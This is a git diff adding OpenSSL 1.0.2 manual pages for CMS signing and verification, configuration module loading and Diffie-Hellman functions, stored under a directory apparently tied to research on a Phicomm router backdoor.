+option of B<receiptsFrom> is used its value is copied to B<pallorfirst>
+otherwise the B<receiptList> field is copied to B<plist>. The B<receiptsTo>
+parameter is copied to B<prto>.
+
+=head1 NOTES
+
+For more details of the meaning of the fields see RFC2634.
+
+The contents of a signed receipt should only be considered meaningful if the
+corresponding CMS_ContentInfo structure can be successfully verified using
+CMS_verify().
+
+=head1 RETURN VALUES
+
+CMS_ReceiptRequest_create0() returns a signed receipt request structure or 
+NULL if an error occurred.
+
+CMS_add1_ReceiptRequest() returns 1 for success or 0 is an error occurred.
+
+CMS_get1_ReceiptRequest() returns 1 is a signed receipt request is found and
+decoded. It returns 0 if a signed receipt request is not present and -1 if
+it is present but malformed.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_sign(3)|CMS_sign(3)>,
+L<CMS_sign_receipt(3)|CMS_sign_receipt(3)>, L<CMS_verify(3)|CMS_verify(3)>
+L<CMS_verify_receipt(3)|CMS_verify_receipt(3)>
+
+=head1 HISTORY
+
+CMS_ReceiptRequest_create0(), CMS_add1_ReceiptRequest(),
+CMS_get1_ReceiptRequest() and CMS_ReceiptRequest_get0_values() were added to
+OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_sign.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_sign.pod
new file mode 100644
index 0000000..2cc72de
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_sign.pod
@@ -0,0 +1,121 @@
+=pod
+
+=head1 NAME
+
+ CMS_sign - create a CMS SignedData structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ CMS_ContentInfo *CMS_sign(X509 *signcert, EVP_PKEY *pkey, STACK_OF(X509) *certs, BIO *data, unsigned int flags);
+
+=head1 DESCRIPTION
+
+CMS_sign() creates and returns a CMS SignedData structure. B<signcert> is
+the certificate to sign with, B<pkey> is the corresponding private key.
+B<certs> is an optional additional set of certificates to include in the CMS
+structure (for example any intermediate CAs in the chain). Any or all of
+these parameters can be B<NULL>, see B<NOTES> below.
+
+The data to be signed is read from BIO B<data>.
+
+B<flags> is an optional set of flags.
+
+=head1 NOTES
+
+Any of the following flags (ored together) can be passed in the B<flags>
+parameter.
+
+Many S/MIME clients expect the signed content to include valid MIME headers. If
+the B<CMS_TEXT> flag is set MIME headers for type B<text/plain> are prepended
+to the data.
+
+If B<CMS_NOCERTS> is set the signer's certificate will not be included in the
+CMS_ContentInfo structure, the signer's certificate must still be supplied in
+the B<signcert> parameter though. This can reduce the size of the signature if
+the signers certificate can be obtained by other means: for example a
+previously signed message.
+
+The data being signed is included in the CMS_ContentInfo structure, unless
+B<CMS_DETACHED> is set in which case it is omitted. This is used for
+CMS_ContentInfo detached signatures which are used in S/MIME plaintext signed
+messages for example.
+
+Normally the supplied content is translated into MIME canonical format (as
+required by the S/MIME specifications) if B<CMS_BINARY> is set no translation
+occurs. This option should be used if the supplied data is in binary format
+otherwise the translation will corrupt it.
+
+The SignedData structure includes several CMS signedAttributes including the
+signing time, the CMS content type and the supported list of ciphers in an
+SMIMECapabilities attribute. If B<CMS_NOATTR> is set then no signedAttributes
+will be used. If B<CMS_NOSMIMECAP> is set then just the SMIMECapabilities are
+omitted.
+
+If present the SMIMECapabilities attribute indicates support for the following
+algorithms in preference order: 256 bit AES, Gost R3411-94, Gost 28147-89, 192
+bit AES, 128 bit AES, triple DES, 128 bit RC2, 64 bit RC2, DES and 40 bit RC2.
+If any of these algorithms is not available then it will not be included: for example the GOST algorithms will not be included if the GOST ENGINE is
+not loaded.
+
+OpenSSL will by default identify signing certificates using issuer name
+and serial number. If B<CMS_USE_KEYID> is set it will use the subject key
+identifier value instead. An error occurs if the signing certificate does not
+have a subject key identifier extension.
+
+If the flags B<CMS_STREAM> is set then the returned B<CMS_ContentInfo>
+structure is just initialized ready to perform the signing operation. The
+signing is however B<not> performed and the data to be signed is not read from
+the B<data> parameter. Signing is deferred until after the data has been
+written. In this way data can be signed in a single pass.
+
+If the B<CMS_PARTIAL> flag is set a partial B<CMS_ContentInfo> structure is
+output to which additional signers and capabilities can be added before
+finalization.
+
+If the flag B<CMS_STREAM> is set the returned B<CMS_ContentInfo> structure is
+B<not> complete and outputting its contents via a function that does not
+properly finalize the B<CMS_ContentInfo> structure will give unpredictable
+results.
+
+Several functions including SMIME_write_CMS(), i2d_CMS_bio_stream(),
+PEM_write_bio_CMS_stream() finalize the structure. Alternatively finalization
+can be performed by obtaining the streaming ASN1 B<BIO> directly using
+BIO_new_CMS().
+
+If a signer is specified it will use the default digest for the signing
+algorithm. This is B<SHA1> for both RSA and DSA keys.
+
+If B<signcert> and B<pkey> are NULL then a certificates only CMS structure is
+output.
+
+The function CMS_sign() is a basic CMS signing function whose output will be
+suitable for many purposes. For finer control of the output format the
+B<certs>, B<signcert> and B<pkey> parameters can all be B<NULL> and the
+B<CMS_PARTIAL> flag set. Then one or more signers can be added using the
+function CMS_sign_add1_signer(), non default digests can be used and custom
+attributes added. B<CMS_final()> must then be called to finalize the
+structure if streaming is not enabled. 
+
+=head1 BUGS
+
+Some attributes such as counter signatures are not supported.
+
+=head1 RETURN VALUES
+
+CMS_sign() returns either a valid CMS_ContentInfo structure or NULL if an error
+occurred. The error can be obtained from ERR_get_error(3).
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_verify(3)|CMS_verify(3)>
+
+=head1 HISTORY
+
+CMS_sign() was added to OpenSSL 0.9.8
+
+The B<CMS_STREAM> flag is only supported for detached data in OpenSSL 0.9.8,
+it is supported for embedded data in OpenSSL 1.0.0 and later.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_sign_receipt.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_sign_receipt.pod
new file mode 100644
index 0000000..cae1f83
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_sign_receipt.pod
@@ -0,0 +1,45 @@
+=pod
+
+=head1 NAME
+
+ CMS_sign_receipt - create a CMS signed receipt
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ CMS_ContentInfo *CMS_sign_receipt(CMS_SignerInfo *si, X509 *signcert, EVP_PKEY *pkey, STACK_OF(X509) *certs, unsigned int flags);
+
+=head1 DESCRIPTION
+
+CMS_sign_receipt() creates and returns a CMS signed receipt structure. B<si> is
+the B<CMS_SignerInfo> structure containing the signed receipt request.
+B<signcert> is the certificate to sign with, B<pkey> is the corresponding
+private key.  B<certs> is an optional additional set of certificates to include
+in the CMS structure (for example any intermediate CAs in the chain).
+
+B<flags> is an optional set of flags.
+
+=head1 NOTES
+
+This functions behaves in a similar way to CMS_sign() except the flag values
+B<CMS_DETACHED>, B<CMS_BINARY>, B<CMS_NOATTR>, B<CMS_TEXT> and B<CMS_STREAM>
+are not supported since they do not make sense in the context of signed
+receipts.
+
+=head1 RETURN VALUES
+
+CMS_sign_receipt() returns either a valid CMS_ContentInfo structure or NULL if
+an error occurred.  The error can be obtained from ERR_get_error(3).
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>,
+L<CMS_verify_receipt(3)|CMS_verify_receipt(3)>,
+L<CMS_sign(3)|CMS_sign(3)>
+
+=head1 HISTORY
+
+CMS_sign_receipt() was added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_uncompress.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_uncompress.pod
new file mode 100644
index 0000000..c6056b0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_uncompress.pod
@@ -0,0 +1,54 @@
+=pod
+
+=head1 NAME
+
+ CMS_uncompress - uncompress a CMS CompressedData structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ int CMS_uncompress(CMS_ContentInfo *cms, BIO *dcont, BIO *out, unsigned int flags);
+
+=head1 DESCRIPTION
+
+CMS_uncompress() extracts and uncompresses the content from a CMS
+CompressedData structure B<cms>. B<data> is a BIO to write the content to and
+B<flags> is an optional set of flags.
+
+The B<dcont> parameter is used in the rare case where the compressed content
+is detached. It will normally be set to NULL.
+
+=head1 NOTES
+
+The only currently supported compression algorithm is zlib: if the structure
+indicates the use of any other algorithm an error is returned.
+
+If zlib support is not compiled into OpenSSL then CMS_uncompress() will always
+return an error.
+
+The following flags can be passed in the B<flags> parameter.
+
+If the B<CMS_TEXT> flag is set MIME headers for type B<text/plain> are deleted
+from the content. If the content is not of type B<text/plain> then an error is
+returned.
+
+=head1 RETURN VALUES
+
+CMS_uncompress() returns either 1 for success or 0 for failure. The error can
+be obtained from ERR_get_error(3)
+
+=head1 BUGS
+
+The lack of single pass processing and the need to hold all data in memory as
+mentioned in CMS_verify() also applies to CMS_decompress().
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_compress(3)|CMS_compress(3)>
+
+=head1 HISTORY
+
+CMS_uncompress() was added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_verify.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_verify.pod
new file mode 100644
index 0000000..7a2c1ee
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_verify.pod
@@ -0,0 +1,126 @@
+=pod
+
+=head1 NAME
+
+CMS_verify, CMS_get0_signers - verify a CMS SignedData structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ int CMS_verify(CMS_ContentInfo *cms, STACK_OF(X509) *certs, X509_STORE *store, BIO *indata, BIO *out, unsigned int flags);
+
+ STACK_OF(X509) *CMS_get0_signers(CMS_ContentInfo *cms);
+
+=head1 DESCRIPTION
+
+CMS_verify() verifies a CMS SignedData structure. B<cms> is the CMS_ContentInfo
+structure to verify. B<certs> is a set of certificates in which to search for
+the signing certificate(s). B<store> is a trusted certificate store used for
+chain verification. B<indata> is the detached content if the content is not
+present in B<cms>. The content is written to B<out> if it is not NULL.
+
+B<flags> is an optional set of flags, which can be used to modify the verify
+operation.
+
+CMS_get0_signers() retrieves the signing certificate(s) from B<cms>, it must
+be called after a successful CMS_verify() operation.
+
+=head1 VERIFY PROCESS
+
+Normally the verify process proceeds as follows.
+
+Initially some sanity checks are performed on B<cms>. The type of B<cms> must
+be SignedData. There must be at least one signature on the data and if
+the content is detached B<indata> cannot be B<NULL>.
+
+An attempt is made to locate all the signing certificate(s), first looking in
+the B<certs> parameter (if it is not NULL) and then looking in any
+certificates contained in the B<cms> structure itself. If any signing
+certificate cannot be located the operation fails.
+
+Each signing certificate is chain verified using the B<smimesign> purpose and
+the supplied trusted certificate store. Any internal certificates in the message
+are used as untrusted CAs. If CRL checking is enabled in B<store> any internal
+CRLs are used in addition to attempting to look them up in B<store>. If any
+chain verify fails an error code is returned.
+
+Finally the signed content is read (and written to B<out> is it is not NULL)
+and the signature's checked.
+
+If all signature's verify correctly then the function is successful.
+
+Any of the following flags (ored together) can be passed in the B<flags>
+parameter to change the default verify behaviour.
+
+If B<CMS_NOINTERN> is set the certificates in the message itself are not
+searched when locating the signing certificate(s). This means that all the
+signing certificates must be in the B<certs> parameter.
+
+If B<CMS_NOCRL> is set and CRL checking is enabled in B<store> then any
+CRLs in the message itself are ignored.
+
+If the B<CMS_TEXT> flag is set MIME headers for type B<text/plain> are deleted
+from the content. If the content is not of type B<text/plain> then an error is
+returned.
+
+If B<CMS_NO_SIGNER_CERT_VERIFY> is set the signing certificates are not
+verified.
+
+If B<CMS_NO_ATTR_VERIFY> is set the signed attributes signature is not 
+verified.
+
+If B<CMS_NO_CONTENT_VERIFY> is set then the content digest is not checked.
+
+=head1 NOTES
+
+One application of B<CMS_NOINTERN> is to only accept messages signed by
+a small number of certificates. The acceptable certificates would be passed
+in the B<certs> parameter. In this case if the signer is not one of the
+certificates supplied in B<certs> then the verify will fail because the
+signer cannot be found.
+
+In some cases the standard techniques for looking up and validating
+certificates are not appropriate: for example an application may wish to 
+lookup certificates in a database or perform customised verification. This
+can be achieved by setting and verifying the signers certificates manually 
+using the signed data utility functions.
+
+Care should be taken when modifying the default verify behaviour, for example
+setting B<CMS_NO_CONTENT_VERIFY> will totally disable all content verification 
+and any modified content will be considered valid. This combination is however
+useful if one merely wishes to write the content to B<out> and its validity
+is not considered important.
+
+Chain verification should arguably be performed using the signing time rather
+than the current time. However since the signing time is supplied by the
+signer it cannot be trusted without additional evidence (such as a trusted
+timestamp).
+
+=head1 RETURN VALUES
+
+CMS_verify() returns 1 for a successful verification and zero if an error
+occurred.
+
+CMS_get0_signers() returns all signers or NULL if an error occurred.
+
+The error can be obtained from L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 BUGS
+
+The trusted certificate store is not searched for the signing certificate,
+this is primarily due to the inadequacies of the current B<X509_STORE>
+functionality.
+
+The lack of single pass processing means that the signed content must all
+be held in memory if it is not detached.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_sign(3)|CMS_sign(3)>
+
+=head1 HISTORY
+
+CMS_verify() was added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_verify_receipt.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_verify_receipt.pod
new file mode 100644
index 0000000..9283e0e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_verify_receipt.pod
@@ -0,0 +1,47 @@
+=pod
+
+=head1 NAME
+
+ CMS_verify_receipt - verify a CMS signed receipt
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ int CMS_verify_receipt(CMS_ContentInfo *rcms, CMS_ContentInfo *ocms, STACK_OF(X509) *certs, X509_STORE *store, unsigned int flags);
+
+=head1 DESCRIPTION
+
+CMS_verify_receipt() verifies a CMS signed receipt. B<rcms> is the signed
+receipt to verify. B<ocms> is the original SignedData structure containing the
+receipt request. B<certs> is a set of certificates in which to search for the
+signing certificate. B<store> is a trusted certificate store (used for chain
+verification). 
+
+B<flags> is an optional set of flags, which can be used to modify the verify
+operation.
+
+=head1 NOTES
+
+This functions behaves in a similar way to CMS_verify() except the flag values
+B<CMS_DETACHED>, B<CMS_BINARY>, B<CMS_TEXT> and B<CMS_STREAM> are not
+supported since they do not make sense in the context of signed receipts.
+
+=head1 RETURN VALUES
+
+CMS_verify_receipt() returns 1 for a successful verification and zero if an
+error occurred.
+
+The error can be obtained from L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>,
+L<CMS_sign_receipt(3)|CMS_sign_receipt(3)>,
+L<CMS_verify(3)|CMS_verify(3)>,
+
+=head1 HISTORY
+
+CMS_verify_receipt() was added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CONF_modules_free.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CONF_modules_free.pod
new file mode 100644
index 0000000..347020c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CONF_modules_free.pod
@@ -0,0 +1,47 @@
+=pod
+
+=head1 NAME
+
+ CONF_modules_free, CONF_modules_finish, CONF_modules_unload -
+ OpenSSL configuration cleanup functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/conf.h>
+
+ void CONF_modules_free(void);
+ void CONF_modules_finish(void);
+ void CONF_modules_unload(int all);
+
+=head1 DESCRIPTION
+
+CONF_modules_free() closes down and frees up all memory allocated by all
+configuration modules.
+
+CONF_modules_finish() calls each configuration modules B<finish> handler
+to free up any configuration that module may have performed.
+
+CONF_modules_unload() finishes and unloads configuration modules. If
+B<all> is set to B<0> only modules loaded from DSOs will be unloads. If
+B<all> is B<1> all modules, including builtin modules will be unloaded.
+
+=head1 NOTES
+
+Normally applications will only call CONF_modules_free() at application to
+tidy up any configuration performed.
+
+=head1 RETURN VALUE
+
+None of the functions return a value.
+
+=head1 SEE ALSO
+
+L<conf(5)|conf(5)>, L<OPENSSL_config(3)|OPENSSL_config(3)>,
+L<CONF_modules_load_file(3)|CONF_modules_load_file(3)>
+
+=head1 HISTORY
+
+CONF_modules_free(), CONF_modules_unload(), and CONF_modules_finish()
+first appeared in OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CONF_modules_load_file.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CONF_modules_load_file.pod
new file mode 100644
index 0000000..0c4d926
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CONF_modules_load_file.pod
@@ -0,0 +1,60 @@
+=pod
+
+=head1 NAME
+
+ CONF_modules_load_file, CONF_modules_load - OpenSSL configuration functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/conf.h>
+
+ int CONF_modules_load_file(const char *filename, const char *appname,
+			   unsigned long flags);
+ int CONF_modules_load(const CONF *cnf, const char *appname,
+		      unsigned long flags);
+
+=head1 DESCRIPTION
+
+The function CONF_modules_load_file() configures OpenSSL using file
+B<filename> and application name B<appname>. If B<filename> is NULL
+the standard OpenSSL configuration file is used. If B<appname> is
+NULL the standard OpenSSL application name B<openssl_conf> is used.
+The behaviour can be cutomized using B<flags>.
+
+CONF_modules_load() is idential to CONF_modules_load_file() except it
+read configuration information from B<cnf>. 
+
+=head1 NOTES
+
+The following B<flags> are currently recognized:
+
+B<CONF_MFLAGS_IGNORE_ERRORS> if set errors returned by individual
+configuration modules are ignored. If not set the first module error is
+considered fatal and no further modules are loads.
+
+Normally any modules errors will add error information to the error queue. If
+B<CONF_MFLAGS_SILENT> is set no error information is added.
+
+If B<CONF_MFLAGS_NO_DSO> is set configuration module loading from DSOs is
+disabled.
+
+B<CONF_MFLAGS_IGNORE_MISSING_FILE> if set will make CONF_load_modules_file()
+ignore missing configuration files. Normally a missing configuration file
+return an error.
+
+=head1 RETURN VALUE
+
+These functions return 1 for success and a zero or negative value for
+failure. If module errors are not ignored the return code will reflect the
+return value of the failing module (this will always be zero or negative).
+
+=head1 SEE ALSO
+
+L<conf(5)|conf(5)>, L<OPENSSL_config(3)|OPENSSL_config(3)>,
+L<CONF_free(3)|CONF_free(3)>, L<err(3)|err(3)>
+
+=head1 HISTORY
+
+CONF_modules_load_file and CONF_modules_load first appeared in OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CRYPTO_set_ex_data.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CRYPTO_set_ex_data.pod
new file mode 100644
index 0000000..7409c02
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CRYPTO_set_ex_data.pod
@@ -0,0 +1,53 @@
+=pod
+
+=head1 NAME
+
+CRYPTO_set_ex_data, CRYPTO_get_ex_data - internal application specific data functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/crypto.h>
+
+ int CRYPTO_set_ex_data(CRYPTO_EX_DATA *r, int idx, void *arg);
+
+ void *CRYPTO_get_ex_data(CRYPTO_EX_DATA *r, int idx);
+
+=head1 DESCRIPTION
+
+Several OpenSSL structures can have application specific data attached to them.
+These functions are used internally by OpenSSL to manipulate application
+specific data attached to a specific structure.
+
+These functions should only be used by applications to manipulate
+B<CRYPTO_EX_DATA> structures passed to the B<new_func()>, B<free_func()> and
+B<dup_func()> callbacks: as passed to B<RSA_get_ex_new_index()> for example.
+
+B<CRYPTO_set_ex_data()> is used to set application specific data, the data is
+supplied in the B<arg> parameter and its precise meaning is up to the
+application.
+
+B<CRYPTO_get_ex_data()> is used to retrieve application specific data. The data
+is returned to the application, this will be the same value as supplied to
+a previous B<CRYPTO_set_ex_data()> call.
+
+=head1 RETURN VALUES
+
+B<CRYPTO_set_ex_data()> returns 1 on success or 0 on failure.
+
+B<CRYPTO_get_ex_data()> returns the application data or 0 on failure. 0 may also
+be valid application data but currently it can only fail if given an invalid B<idx>
+parameter.
+
+On failure an error code can be obtained from L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<RSA_get_ex_new_index(3)|RSA_get_ex_new_index(3)>,
+L<DSA_get_ex_new_index(3)|DSA_get_ex_new_index(3)>,
+L<DH_get_ex_new_index(3)|DH_get_ex_new_index(3)>
+
+=head1 HISTORY
+
+CRYPTO_set_ex_data() and CRYPTO_get_ex_data() have been available since SSLeay 0.9.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_generate_key.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_generate_key.pod
new file mode 100644
index 0000000..81f09fd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_generate_key.pod
@@ -0,0 +1,50 @@
+=pod
+
+=head1 NAME
+
+DH_generate_key, DH_compute_key - perform Diffie-Hellman key exchange
+
+=head1 SYNOPSIS
+
+ #include <openssl/dh.h>
+
+ int DH_generate_key(DH *dh);
+
+ int DH_compute_key(unsigned char *key, BIGNUM *pub_key, DH *dh);
+
+=head1 DESCRIPTION
+
+DH_generate_key() performs the first step of a Diffie-Hellman key
+exchange by generating private and public DH values. By calling
+DH_compute_key(), these are combined with the other party's public
+value to compute the shared key.
+
+DH_generate_key() expects B<dh> to contain the shared parameters
+B<dh-E<gt>p> and B<dh-E<gt>g>. It generates a random private DH value
+unless B<dh-E<gt>priv_key> is already set, and computes the
+corresponding public value B<dh-E<gt>pub_key>, which can then be
+published.
+
+DH_compute_key() computes the shared secret from the private DH value
+in B<dh> and the other party's public value in B<pub_key> and stores
+it in B<key>. B<key> must point to B<DH_size(dh)> bytes of memory.
+
+=head1 RETURN VALUES
+
+DH_generate_key() returns 1 on success, 0 otherwise.
+
+DH_compute_key() returns the size of the shared secret on success, -1
+on error.
+
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<dh(3)|dh(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<rand(3)|rand(3)>, L<DH_size(3)|DH_size(3)>
+
+=head1 HISTORY
+
+DH_generate_key() and DH_compute_key() are available in all versions
+of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_generate_parameters.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_generate_parameters.pod
new file mode 100644
index 0000000..7f81a04
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_generate_parameters.pod
@@ -0,0 +1,82 @@
+=pod
+
+=head1 NAME
+
+
+DH_generate_parameters_ex, DH_generate_parameters,
+DH_check - generate and check Diffie-Hellman parameters
+
+=head1 SYNOPSIS
+
+ #include <openssl/dh.h>
+
+ int DH_generate_parameters_ex(DH *dh, int prime_len,int generator, BN_GENCB *cb);
+
+ int DH_check(DH *dh, int *codes);
+
+Deprecated:
+
+ DH *DH_generate_parameters(int prime_len, int generator,
+     void (*callback)(int, int, void *), void *cb_arg);
+
+=head1 DESCRIPTION
+
+DH_generate_parameters_ex() generates Diffie-Hellman parameters that can
+be shared among a group of users, and stores them in the provided B<DH>
+structure. The pseudo-random number generator must be
+seeded prior to calling DH_generate_parameters().
+
+B<prime_len> is the length in bits of the safe prime to be generated.
+B<generator> is a small number E<gt> 1, typically 2 or 5. 
+
+A callback function may be used to provide feedback about the progress
+of the key generation. If B<cb> is not B<NULL>, it will be
+called as described in L<BN_generate_prime(3)|BN_generate_prime(3)> while a random prime
+number is generated, and when a prime has been found, B<BN_GENCB_call(cb, 3, 0)>
+is called. See L<BN_generate_prime(3)|BN_generate_prime(3)> for information on
+the BN_GENCB_call() function.
+
+DH_check() validates Diffie-Hellman parameters. It checks that B<p> is
+a safe prime, and that B<g> is a suitable generator. In the case of an
+error, the bit flags DH_CHECK_P_NOT_SAFE_PRIME or
+DH_NOT_SUITABLE_GENERATOR are set in B<*codes>.
+DH_UNABLE_TO_CHECK_GENERATOR is set if the generator cannot be
+checked, i.e. it does not equal 2 or 5.
+
+=head1 RETURN VALUES
+
+DH_generate_parameters_ex() and DH_check() return 1 if the check could be
+performed, 0 otherwise.
+
+DH_generate_parameters() (deprecated) returns a pointer to the DH structure, or
+NULL if the parameter generation fails.
+
+The error codes can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 NOTES
+
+DH_generate_parameters_ex() and DH_generate_parameters() may run for several
+hours before finding a suitable prime.
+
+The parameters generated by DH_generate_parameters_ex() and DH_generate_parameters()
+are not to be used in signature schemes.
+
+=head1 BUGS
+
+If B<generator> is not 2 or 5, B<dh-E<gt>g>=B<generator> is not
+a usable generator.
+
+=head1 SEE ALSO
+
+L<dh(3)|dh(3)>, L<ERR_get_error(3)|ERR_get_error(3)>, L<rand(3)|rand(3)>,
+L<DH_free(3)|DH_free(3)>
+
+=head1 HISTORY
+
+DH_check() is available in all versions of SSLeay and OpenSSL.
+The B<cb_arg> argument to DH_generate_parameters() was added in SSLeay 0.9.0.
+
+In versions before OpenSSL 0.9.5, DH_CHECK_P_NOT_STRONG_PRIME is used
+instead of DH_CHECK_P_NOT_SAFE_PRIME.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_get_ex_new_index.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_get_ex_new_index.pod
new file mode 100644
index 0000000..fa5eab2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_get_ex_new_index.pod
@@ -0,0 +1,36 @@
+=pod
+
+=head1 NAME
+
+DH_get_ex_new_index, DH_set_ex_data, DH_get_ex_data - add application specific data to DH structures
+
+=head1 SYNOPSIS
+
+ #include <openssl/dh.h>
+
+ int DH_get_ex_new_index(long argl, void *argp,
+		CRYPTO_EX_new *new_func,
+		CRYPTO_EX_dup *dup_func,
+		CRYPTO_EX_free *free_func);
+
+ int DH_set_ex_data(DH *d, int idx, void *arg);
+
+ char *DH_get_ex_data(DH *d, int idx);
+
+=head1 DESCRIPTION
+
+These functions handle application specific data in DH
+structures. Their usage is identical to that of
+RSA_get_ex_new_index(), RSA_set_ex_data() and RSA_get_ex_data()
+as described in L<RSA_get_ex_new_index(3)>.
+
+=head1 SEE ALSO
+
+L<RSA_get_ex_new_index(3)|RSA_get_ex_new_index(3)>, L<dh(3)|dh(3)>
+
+=head1 HISTORY
+
+DH_get_ex_new_index(), DH_set_ex_data() and DH_get_ex_data() are
+available since OpenSSL 0.9.5.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_new.pod
new file mode 100644
index 0000000..60c9300
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_new.pod
@@ -0,0 +1,40 @@
+=pod
+
+=head1 NAME
+
+DH_new, DH_free - allocate and free DH objects
+
+=head1 SYNOPSIS
+
+ #include <openssl/dh.h>
+
+ DH* DH_new(void);
+
+ void DH_free(DH *dh);
+
+=head1 DESCRIPTION
+
+DH_new() allocates and initializes a B<DH> structure.
+
+DH_free() frees the B<DH> structure and its components. The values are
+erased before the memory is returned to the system.
+
+=head1 RETURN VALUES
+
+If the allocation fails, DH_new() returns B<NULL> and sets an error
+code that can be obtained by L<ERR_get_error(3)|ERR_get_error(3)>. Otherwise it returns
+a pointer to the newly allocated structure.
+
+DH_free() returns no value.
+
+=head1 SEE ALSO
+
+L<dh(3)|dh(3)>, L<ERR_get_error(3)|ERR_get_error(3)>,
+L<DH_generate_parameters(3)|DH_generate_parameters(3)>,
+L<DH_generate_key(3)|DH_generate_key(3)>
+
+=head1 HISTORY
+
+DH_new() and DH_free() are available in all versions of SSLeay and OpenSSL.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_set_method.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_set_method.pod
new file mode 100644
index 0000000..d5cdc3b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/DH_set_method.pod
@@ -0,0 +1,129 @@
+=pod
+
+=head1 NAME
+
+DH_set_default_method, DH_get_default_method,
+DH_set_method, DH_new_method, DH_OpenSSL - select DH method
+
+=head1 SYNOPSIS
+
+ #include <openssl/dh.h>
+ #include <openssl/engine.h>
+
+ void DH_set_default_method(const DH_METHOD *meth);
+
+ const DH_METHOD *DH_get_default_method(void);
+
